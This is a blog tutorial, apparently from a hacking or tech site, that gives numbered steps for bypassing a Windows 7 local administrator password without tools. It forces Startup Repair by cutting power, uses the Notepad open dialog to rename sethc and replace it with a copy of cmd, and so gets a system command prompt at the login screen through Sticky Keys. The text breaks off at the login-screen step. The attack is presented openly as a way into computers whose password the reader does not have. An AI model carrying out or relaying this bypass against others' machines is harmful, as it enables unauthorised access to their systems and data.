Hack Windows 7 Account Password

<span style="background-color: white; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px;">The password protection in Windows is a good precaution against nosy individuals. But really it is not that safe. If someone really want to get access to a password protected Windows computer – they probably will. There are software out there to help you do this, but with the right methods you don’t event need tools. In this tutorial we are going to have a look at how to hack a Windows 7 password for a local administrator account without using any tools at all.</span><br /> <span style="background-color: white; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px;"><br /></span> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoiWhgGk3CHb05KlRz_DpTb5YpvboiWPKIvGLayVk5kyAL3cJICyq5Zcm5ySwfaMsCYDIqDaiidekS_Cu1h8SH5MMsVP0ZAV_QnbULkEE2EeHREjlEaYLaemdWbKYKjdKLC5c_8Dgj_Tc/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoiWhgGk3CHb05KlRz_DpTb5YpvboiWPKIvGLayVk5kyAL3cJICyq5Zcm5ySwfaMsCYDIqDaiidekS_Cu1h8SH5MMsVP0ZAV_QnbULkEE2EeHREjlEaYLaemdWbKYKjdKLC5c_8Dgj_Tc/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <span style="background-color: white; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px;"><br /></span> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> We have a Windows 7 computer, which we cannot log in to because we do not have the correct password. The object is to remove the password and gain access.</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 1. Reboot the computer</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> Wait for the splash screen showing <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Starting Window</strong> is shown.</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfmYiE5ssiyyHeH5lsAWIj6ityXDmux2hDSo7hhudxIYDECRZvso7KUq1pC0dLbNP1ervIXOu1XzpY67f13qGnBHHcmX6Q6yFDIMtZ68s3N3SnmtwOSUr0IE-9BFONDjqMjkmOIewv9Rc/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfmYiE5ssiyyHeH5lsAWIj6ityXDmux2hDSo7hhudxIYDECRZvso7KUq1pC0dLbNP1ervIXOu1XzpY67f13qGnBHHcmX6Q6yFDIMtZ68s3N3SnmtwOSUr0IE-9BFONDjqMjkmOIewv9Rc/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <br /></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 2. While the splash screen is shown, cut the power to the computer</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 3. Plug in the power in again and start the computer again</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> You will now get a screen asking you if you want to <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Launch Start-up Repair (recommended)</strong></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy1GFOmbKZR-9oH9C1XBepOPWwWj-06niXuFi1JaKIE6H4O2aPOvR1oop4Md7COUXpYhQ1FSVW-MhWPYTa8ee9yC2lWRe_mRuVt6NXvvumcXsC8b6ot0ECh4Z57-5ZujKErf1RhJcwJ58/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy1GFOmbKZR-9oH9C1XBepOPWwWj-06niXuFi1JaKIE6H4O2aPOvR1oop4Md7COUXpYhQ1FSVW-MhWPYTa8ee9yC2lWRe_mRuVt6NXvvumcXsC8b6ot0ECh4Z57-5ZujKErf1RhJcwJ58/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 4. Press <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Enter</strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; font-weight: normal; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><a href="https://ifconfig.dk/wp-content/uploads/2013/06/4restore_edited.jpg" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #ffa200; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"></a></strong></div> <br /> <div style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 16px; margin: 0px 0px 24px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: auto; word-spacing: 0px;"> Startup repair starts scanning the computer for problems, in the process the dialog box<strong style="background: transparent; border: 0px; font-weight: bold; margin: 0px; padding: 0px; vertical-align: baseline;">Startup Repair</strong> opens and asked if you want to restore form an earlier point in time.</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4qIrddwI7CbODgsC69Pitf8bcZirq5IAdmajWmig907nV-infH17uzctLeUK79bUlbZuvgbZg8yXqmeR8MS90lDhWwJ1YJ4gQtcbejHE89Os8jVKQPqlHw7LJFLG6ZPsGGUMPYdQo30c/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4qIrddwI7CbODgsC69Pitf8bcZirq5IAdmajWmig907nV-infH17uzctLeUK79bUlbZuvgbZg8yXqmeR8MS90lDhWwJ1YJ4gQtcbejHE89Os8jVKQPqlHw7LJFLG6ZPsGGUMPYdQo30c/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 16px; margin: 0px 0px 24px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: auto; word-spacing: 0px;"> <br /></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 5. Press the <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Cancel</strong> button</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> Let the scan finish, it might take a while to do so. Ones it’s done a new dialog box called<strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Startup Repair</strong> appears to tell you that it was not able to repair the computer automatically.</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 6. Click the arrow next to <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">View problem details</strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 7. Scroll down to the bottom of the description box</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 8. Click the link <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">X:\Windows\System32\en-US\erofflps.txt</strong></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQfqvwypNvxXVQ7mv7JWPHW_LiQyHKmL0uDq8noE7f42EC3rs3bTm17GMVYYlXq8_HLr-IySa6m6hncDHxKUZrKxILhzoX-SQgTh2583jbccxCEbSHeGDiTT3PtanCk93uBxvb8gppKOk/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQfqvwypNvxXVQ7mv7JWPHW_LiQyHKmL0uDq8noE7f42EC3rs3bTm17GMVYYlXq8_HLr-IySa6m6hncDHxKUZrKxILhzoX-SQgTh2583jbccxCEbSHeGDiTT3PtanCk93uBxvb8gppKOk/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> Notepad opens – and here comes the magic. You are now able to browse the system files with administrative rights. We will now make it possible to open an administrative command prompt from the login screen. We will do this with a small hack to the Sethc application, that is normally used to enable the Sticky Keys function by pressing the shift key five times.</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; font-weight: normal; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><a href="https://ifconfig.dk/wp-content/uploads/2013/06/6open_edited.jpg" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #ffa200; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"></a></strong></div> <br /> <div style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 16px; margin: 0px 0px 24px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: auto; word-spacing: 0px;"> 9. Press <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">File</strong> | <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Open</strong></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDcjtu7wqcSgooU-zOCBO1a0jySMj7iITic1edK_kNd6Qz6iSR0opdBKZy324l0ArXw-YeKziJzvdHoHkSAEv6rl17QEXr5BCJS1WrRAbVx3t85Uv6G_Bn4E1rtytGWHEiw-m82ExXGsg/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDcjtu7wqcSgooU-zOCBO1a0jySMj7iITic1edK_kNd6Qz6iSR0opdBKZy324l0ArXw-YeKziJzvdHoHkSAEv6rl17QEXr5BCJS1WrRAbVx3t85Uv6G_Bn4E1rtytGWHEiw-m82ExXGsg/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 16px; margin: 0px 0px 24px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: auto; word-spacing: 0px;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> The dialog box Open opens</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 10. Browse to <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">C:\Windows\System32</strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 11. Choose <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">All Files</strong> in the dropdown menu <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Files of Type:</strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 12. Locate the file <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Sethc</strong> and rename it to <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Sethc1</strong></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe3HlJJLTaFZvalXOW8E1Rc7oBtqt6ewwpZItJHOzwxS7gdcrY1xSylrwLJlvCEz8koYIdC_Lo-F6moBGDTQvyMmyX6uEAI5D_XTnkLx0RSHqKRsIenR2Z_01NjNZ1uAPXG-DolEpL2ZU/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe3HlJJLTaFZvalXOW8E1Rc7oBtqt6ewwpZItJHOzwxS7gdcrY1xSylrwLJlvCEz8koYIdC_Lo-F6moBGDTQvyMmyX6uEAI5D_XTnkLx0RSHqKRsIenR2Z_01NjNZ1uAPXG-DolEpL2ZU/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 13. Locate the file <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">cmd</strong> and copy it</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 14. Renamed the copied file <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">cmd – copy</strong> to <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Sethc</strong></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeqQQrJGq7cs3dBnk-88vQ7AIddIlnJedUKc99sG2XCm2xx3aUZWX9xpH-Gx43RD77HQ6ififgKs7jzpXmgZAB6AFLniV6xaF5_Mn3lEK7u7lV_ZksLdSXF37-fnXNlTweqgfGq7tFCw/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeqQQrJGq7cs3dBnk-88vQ7AIddIlnJedUKc99sG2XCm2xx3aUZWX9xpH-Gx43RD77HQ6ififgKs7jzpXmgZAB6AFLniV6xaF5_Mn3lEK7u7lV_ZksLdSXF37-fnXNlTweqgfGq7tFCw/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> That’s it – We should now be able to press the <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Shift</strong> key five time and instead of opening the original <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Sethc</strong> application file, the OS will now open application <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">cmd</strong> renamed to <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Sethc</strong>.</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 15. Close the dialog box <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Open</strong> and the text document <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">erofflps.txt</strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 16. Press the <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Don´t send</strong> button in the <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Startup Repair</strong> box</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"></strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 17. Click the <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Finish</strong> button</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsJRxanvbSe3bNxAeVDR78ffV-_RCQONwPHVJnZMJhk-iyBkwJW9KPqbbR5u7wBPu9TToDa1YlJpv24x1t9HozpV5ncQfGwv1YHP23Idpro_tF-gBqA8IR1J7HQUCsniN0olJ8cHeCBt4/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsJRxanvbSe3bNxAeVDR78ffV-_RCQONwPHVJnZMJhk-iyBkwJW9KPqbbR5u7wBPu9TToDa1YlJpv24x1t9HozpV5ncQfGwv1YHP23Idpro_tF-gBqA8IR1J7HQUCsniN0olJ8cHeCBt4/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <br /></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> The computer is now shut down, turn it back on and wait for it to get to the login screen.</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: 